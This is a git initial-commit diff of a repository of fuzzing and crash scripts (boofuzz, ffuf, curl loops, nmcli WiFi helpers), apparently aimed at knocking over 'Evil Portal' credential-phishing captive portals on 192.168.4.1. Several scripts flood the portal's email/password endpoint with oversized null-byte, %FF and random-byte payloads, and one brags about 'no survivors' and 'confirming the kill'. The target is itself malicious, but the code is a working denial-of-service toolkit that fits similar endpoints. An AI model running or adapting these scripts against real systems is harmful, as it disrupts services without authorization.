initial commit

This commit is contained in:
2024-09-23 19:04:55 -06:00
commit 215d204f7d
56 changed files with 292137 additions and 0 deletions
+45
View File
@@ -0,0 +1,45 @@
from boofuzz import *
import datetime
import time
def main():
port = 80
# host = '10.0.0.80'
host = '192.168.4.1'
file_tag = 'Marauder-CYD'
# web_interface_listen='0.0.0.0'
web_interface_listen='10.0.0.79'
web_interface_listen_port=26000
currenttime = datetime.datetime.now()
ct = currenttime.strftime("%d%m%Y-%H.%M.%S")
output_filename=f"./boofuzz-results/{file_tag}-{ct}.db"
session_persistsant_filename=f"./boofuzz-results/session-save-{file_tag}-{ct}.dat"
session = Session(
target=Target(connection=TCPSocketConnection(host, port)),
receive_data_after_fuzz=True,
web_address=web_interface_listen,
web_port=web_interface_listen_port,
db_filename=output_filename,
session_filename=session_persistsant_filename,
sleep_time=0.225
)
s_initialize(name="Request")
with s_block("Request-Line"):
s_group("http-method", ["GET", "HEAD", "POST"])
s_static(" ", "space-0")
s_static("/get?email=", name="uri-start")
s_string("email", name="emailvar")
s_static("&password=", name="password")
s_string("password", name="passwordvar")
s_static(" ", "space-1")
s_static("HTTP/1.1", "http-version")
s_static("\r\n\r\n", "Request-CRLF")
session.connect(s_get("Request"))
session.fuzz()
if __name__ == "__main__":
main()
+27
View File
@@ -0,0 +1,27 @@
#!/bin/bash
wifi_device=wlan1
ssid=Guest-WiFi
# password=
# deletei=True
echo "Interface $wifi_device"
echo "Disconnecting"
sudo nmcli d disconnect $wifi_device
if [ ! -z $deletei ]; then
echo "Deleting Wifi Profiles"
sudo nmcli connection show | sudo awk '{system("nmcli connection delete " $1)}'
echo "Sleeping 3 Seconds"
sleep 3
fi
sudo nmcli dev wifi rescan
echo "Connecting to $ssid"
if [ -z $password ]; then
sudo nmcli device wifi connect $ssid ifname $wifi_device
else
sudo nmcli device wifi connect $ssid password $password ifname $wifi_device
fi
ifconfig $wifi_device
+6
View File
@@ -0,0 +1,6 @@
wifi_device=wlan1
echo "Interface $wifi_device"
echo "Disconnecting"
sudo nmcli d disconnect $wifi_device > /dev/null
echo "Deleting Wifi Profiles"
sudo nmcli connection show | sudo awk '{system("nmcli connection delete " $1)}' > /dev/null
+23
View File
@@ -0,0 +1,23 @@
#!/bin/bash
wifi_device=wlan1
ssid=Guest-WiFi
host="192.168.4.1"
wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt
sudo nmcli d disconnect $wifi_device > /dev/null
sudo nmcli dev wifi rescan > /dev/null
echo -e "\nCashing This Evil Portal With No Survivors\n"
sudo nmcli device wifi connect $ssid ifname $wifi_device
echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n"
ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3
echo -e "\n\nPinging To Confirm Kill...\n"
ping -c 4 $host
echo -e "\nThat Was Big Payload (4U)\nRIP"
+18
View File
@@ -0,0 +1,18 @@
import subprocess
# host = "http://192.168.4.1"
host = "http://10.0.0.80"
charlen = 2000
char = "%FF"
curl_cmd = "curl --silent"
payload = char*charlen
uri = f"{host}/get.php?email={payload}&password={payload}"
command = f"{curl_cmd} '{uri}'"
print(f"\nCrashing This Evil Portal With No Survivors Using: {charlen} {char}s\n")
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
print("That's A Big Load (4U)\n\nDone")
+23
View File
@@ -0,0 +1,23 @@
#!/bin/bash
wifi_device=wlan1
ssid=Guest-WiFi
host="192.168.4.1"
wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt
sudo nmcli d disconnect $wifi_device > /dev/null
sudo nmcli dev wifi rescan > /dev/null
echo -e "\nCashing This Evil Portal With No Survivors\n"
sudo nmcli device wifi connect $ssid ifname $wifi_device
echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n"
ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3
echo -e "\n\nPinging To Confirm Kill...\n"
ping -c 4 $host
echo -e "\nThat Was Big Payload (4U)\nRIP"
+7
View File
@@ -0,0 +1,7 @@
ffuf -w Metacharacters.fuzzdb.txt -u "http://172.0.0.1/get?email=FUZZ\&password=%00%00" -H "FUZZ:FUZZ" -mc all -ac -rate 60
curl -i "http://192.168.4.1/get?email=one%00one\&password=two%00two" #-i dumps headers
curl -i --raw "http://192.168.4.1/get?email=one%00one\&password=two`printf \0`two"
ffuf -w /usr/share/wordlists/john.lst -u "http://192.168.4.1/get?email=FUZZ&password=FUZZ" -fc all -rate 60
ffuf -w /usr/share/wordlists/john.lst -u "http://192.168.4.1/get?email=FUZZ&password=FUZZ" -fc all -rate 4 -t 1
ffuf -w /usr/share/wordlists/seclists/Fuzzing/big-list-of-naughty-strings.txt -u "http://192.168.4.1/get?email=FUZZ&password=FUZZ" -fc all -rate 4 -t 1
ffuf -w /usr/share/wordlists/seclists/Fuzzing/big-list-of-naughty-strings.txt -u "http://192.168.4.1/get?email=FUZZ&password=FUZZ" -fc all -rate 4 -t 2
@@ -0,0 +1,3 @@
Chars: %00*1489 - Prepend: - Append:
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+40
View File
@@ -0,0 +1,40 @@
import datetime
import subprocess
import time
# host = "10.0.0.80"
host = "192.168.4.1"
rangei = 65536 # FFFF+1
currenttime = datetime.datetime.now()
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
for x in range(rangei):
hexcode = hex(x)[2:]
if x > 255:
urlformatted_raw = "%{:04x}".format(x)
hexformatted_raw = "0x{:04x}".format(x)
urlformatted = f"{urlformatted_raw[:3]}%{urlformatted_raw[3:]}"
else:
urlformatted_raw = "%{:04x}".format(x)
urlformatted = "%{:02x}".format(x)
hexformatted = "0x{:02x}".format(x)
unicode_formatted = "%u{:04x}".format(x)
printformatted = f"\\x{hexcode}"
print(f"Running {urlformatted} and {urlformatted_raw} and {unicode_formatted}")
p = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted}email&password=password{urlformatted}password' >> fuzzing-results/urlformatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
p1 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted_raw}email&password=password{urlformatted_raw}password' >> fuzzing-results/urlformatted_raw-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
p2 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{unicode_formatted}email&password=password{unicode_formatted}password' >> fuzzing-results/unicode_formatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
(output, err) = p1.communicate()
(output, err) = p2.communicate()
p_status = p.wait()
p_status1 = p1.wait()
p_status2 = p2.wait()
time.sleep(0.225)
print(f"\n\nlog written to fuzzing-results/X-{rangei}-{datestamp}.txt")
+42
View File
@@ -0,0 +1,42 @@
import datetime
import subprocess
import time
host = "http://10.0.0.80"
# host = "http://192.168.4.1"
charlen = 1489
char = "%00"
prepend = ""
append = ""
currenttime = datetime.datetime.now()
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
outfile = f"fuzzing-results/hex-sniper-rifle-{datestamp}.txt"
# -i, --include - include header in output
# -I, --head - HEAD http method
# -s, --silent - supresses progress and errors
# -S, --show-error - when used with -s/--silent, displays errors
# -D <file>, --dump-header <file> - saves response headers to <file>
# -f, --fail - fail silently on HTTP error
# -X, --request - request method, defaults to GET
# -H <header:value>, --header <header:value> - sets header, multiple are allowed
# -v, --verbose - show request headers
# -o <file>, --output <file> - write output to file
# curl_cmd = "curl -i -s -S -v"
curl_cmd = "curl --include --silent --show-error"
chars = char*charlen
payload = f"{prepend}{chars}{append}"
uri = f"{host}/get.php?email={payload}&password=holdstill"
command = f"{curl_cmd} '{uri}' >> {outfile}"
print(f"\n\nRunning {char}*{charlen} on email\nPrepend: {prepend}\nAppend: {append}\nOutfile: {outfile}")
with open(outfile, "a") as log:
log.write(f"\n\nChars: {char}*{charlen} - Prepend: {prepend} - Append: {append}\n")
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
print(f"\n\nlog written to {outfile}")
+45
View File
@@ -0,0 +1,45 @@
import datetime
import subprocess
import time
# host = "http://10.0.0.80"
host = "http://192.168.4.1"
rangei = 10000
char = "X"
# char = "%00"
prepend = ""
append = ""
#append = "%0a%00%0a"
currenttime = datetime.datetime.now()
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
outfile = f"fuzzing-results/chars-{rangei}-{datestamp}.txt"
# -i, --include - include header in output
# -I, --head - HEAD http method
# -s, --silent - supresses progress and errors
# -S, --show-error - when used with -s/--silent, displays errors
# -D <file>, --dump-header <file> - saves response headers to <file>
# -f, --fail - fail silently on HTTP error
# -X, --request - request method, defaults to GET
# -H <header:value>, --header <header:value> - sets header, multiple are allowed
# -v, --verbose - show request headers
# -o <file>, --output <file> - write output to file
# curl_cmd = "curl -i -s -S -v"
curl_cmd = "curl --include --silent --show-error"
for x in range(rangei+1):
chars = char*x
payload = f"{prepend}{chars}{append}"
uri = f"{host}/get?email={payload}&password={payload}"
command = f"{curl_cmd} '{uri}' >> {outfile}"
print(f"Running {x}/{rangei} chars ({char})\n\tPrepend: {prepend}\n\tAppend: {append}\n\Outfile: {outfile}\n")
with open(outfile, "a") as log:
log.write(f"\n\n{x}/{rangei} - Char: {char} - Prepend: {prepend} - Append: {append}\n")
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
print(f"\n\nlog written to {outfile}")
+1
View File
@@ -0,0 +1 @@
source boofuzz/env/bin/activate
+24
View File
@@ -0,0 +1,24 @@
import subprocess
import os
# from requests.utils import requote_uri
import urllib.parse
from random import randbytes
host = "http://192.168.4.1"
# host = "http://10.0.0.80"
rangei = 10000
# charlen = 4*400
charlen = 128
curl_cmd = "curl --include --silent --show-error"
for x in range(rangei+1):
payload = urllib.parse.quote(randbytes(charlen))
uri = f"{host}/get?email={payload}&password={payload}"
command = f"{curl_cmd} '{uri}'"
print(f"{x} of {rangei} sets of {charlen} random bytes")
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
print(f"\n\nThe End")